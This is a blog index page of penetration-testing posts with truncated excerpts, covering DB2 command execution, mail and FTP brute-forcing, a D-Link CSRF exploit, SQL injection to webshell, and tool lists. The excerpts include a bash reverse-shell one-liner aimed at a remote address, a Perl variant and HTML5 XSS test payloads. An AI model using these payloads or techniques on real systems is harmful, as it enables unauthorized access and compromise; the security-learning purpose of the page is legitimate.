202007-23 日常渗透测试搞站记录 DB2 数据库权限执行系统命令 记录一下拿到db2数据库权限之后,进行系统命令执行的过程,db2默认绑定的是50000端口: 1、创建一个临时的表 CREATE TABLE 数据库名.表名 ( test VARCHAR (500) ) ; 2、创建存储过程(windows) CREATE PROC.... Read More >
201703-09 如何最大化的将漏洞扼杀在摇篮里 安全攻城狮在公司存在之初,刚开始更多进行的是救火的工作,救火工作并不能从根源上解决漏洞的产生。 如何最大化的将漏洞扼杀在产生之初,这个实际上某个dalao提的问题,问了几位老司机,做一下小笔记。 1,定期化的安全培训,需要注重培训效果、培训次数、培训覆盖面、帮助文档、培训反馈; 2,系统设计阶段,就需要安全测试小伙伴的介入,了解开发过程、熟悉业务流程,只有掌握足够多的信息,才能发.... Read More >
201505-25 企业邮箱爆破小脚本(Python版) 之前发了一个帖子: http://zone.wooyun.org/content/20379 总结了几种企业邮箱爆破的一些小技巧,直接贴出具体的爆破脚本吧。以163企业邮箱为例,目前这个是单线程的,也是从网上找到的爆破google邮箱的代码简单修改成的,只支持pop3协议。小伙伴们可以修改成支持多种.... Read More >
201502-08 Android APP安全测试基础 自从去了新公司之后,工作太忙,变的有点懒了,很久没有更新Blog。今天跟几个小伙伴一起吃饭,小伙伴提起我的Blog,想想是该更新更新了,就把我投稿给sobug的这篇转过来吧,关于Android app安全测试的基础东东,在Sobug 的url: https://sobug.com/articl.... Read More >
201401-22 D-link路由器CSRF漏洞利用详解 1,介绍 本文的目的是展示CSRF漏洞的危害,以D-link的DIR-600路由器(硬件版本:BX,固件版本:2.16)的CSRF漏洞为例。 D-link的CSRF漏洞已经是公开的,本文将详细描述一下整个D-link CSRF漏洞的利用,如何通过CSRF漏洞实现远程管理访问D-link路由器。 2,CSRF漏洞说明 如果某些request请求中没有csrf token或不.... Read More >
201311-19 FTP帐号密码暴力破解小工具(新手学python) 群内一童鞋写的ftp暴力破解小工具,主要用到了FTP模块,功能很简单,不大实用,还有很多需要改进的地方,贴上代码: from ftplib import FTP import time def ConnectFtp(ftpAddress,user,password): for myaddress in ftpAddress: f=FTP(myaddress) .... Read More >
201311-07 python自动投票(新手学python) 前段时间看到黑马发起的2013年度创业家评选的网络投票活动,发现没有对单IP投票次数进行限制,可以无限次的投! 公司的大BOSS居然也在候选名单中,准备给大BOSS刷点票,写了个python自动投票脚本!主要用了httplib模块自动提交post请求. 贴上代码: #!/usr/bin/env python #coding=utf8 import httplib, urlli.... Read More >
201310-21 反弹shell的十种姿势 转载自 Wooyun Zone 作者:XSSER bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成,所以某些情况下不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socke.... Read More >
201308-11 浅谈内容欺骗漏洞 内容欺骗漏洞是指攻击者可以通过修改网页源代码,让访问者觉得是该功能或者该站点是可信合法的,来达到欺骗用户的目的。内容欺骗往往利用web服务的用户和组织之间建立的信任关系,意图是欺骗用户,达到钓鱼获取用户敏感信息的目的。 OWASP也将也被称为内容注射或者虚拟污损,内容欺骗漏洞攻击一般是和社会工.... Read More >
201307-10 HTML5下的XSS测试代码 国外某童鞋收集整理的针对HTML5的 XSS测试代码 <video> <source onerror=”javascript:alert(1)”> 引入媒体类测试代码Example: <video onerror=”javascript:alert(1)”>.... Read More >
201304-25 共享的主机服务器风险简单分析 这篇文章的目标受众是服务器管理员,网站管理员,安全爱好者和专业信息安全人员等,主要简单分析了一个主机服务器存在的一些风险。 让我们来看看在一个共享的托管服务器上,你的网站不是那么安全的一些原因: 1,如果服务器上有任何一个网站被攻破,其它的网站可能也会面临被攻破的可能; 2,恶意攻击用户可以从主机提供商购买虚拟主机,然后达到入侵其它同服务器网站的目的; 3,虚拟主机没有足够.... Read More >
201304-18 DVWA之从SQL注入到写入webshell 这篇文章谈论简单的技术,利用sql注入(SQLi)漏洞,并获得一个webshell,所有的演示都是用DVWA(渗透测试演练系统).对于SQL注入利用,有以下几个基本步骤: 1,发现SQL注入点; 2,通过mysql数据库帮助,进一步进行注入,获取帐号密码等敏感信息; 3,上传web.... Read More >
201209-30 [转载]Android平台下渗透测试工具集合 Ad Network Detector (1.2): http://market.android.com/details?id=com.lookout.addetector App Backup & Restore (1.0.5): http://market.android.com/.... Read More >
201209-26 Web应用程序渗透测试工具IronWASP IronWASP是一款优秀的web应用程序高级安全性的测试平台,是开源的系统,主要用户测试Web应用程序的漏洞。这个工具是非常简单易用的,初学者可以使用。如果用户对python和ruby比较了解的话,还开源用这个工具创建自定义的扫描。 这个工具的另外一大优势是,它使用各种外部库,使之更加强大,.... Read More >
201208-17 IBM Rational Appscan使用之扫描结果分析 之前有IBM Rational Appscan使用详细说明的一篇文章,主要是针对扫描过程中配置设置等.本文将介绍针对扫描结果的分析,也是一次完整的渗透测试必须经历的环节. 扫描开始的时候,Appscan会询问是否保存扫描结果,同时下方有进度条显示扫描的进度. 在扫描过程中,如.... Read More >
201206-16 Web安全工具大汇聚 转载自:素包子's blog http://baoz.net Test sites / testing grounds SPI Dynamics (live) – http://zero.webappsecurity.com/ Cenzic (live) – http://crackme.c.... Read More >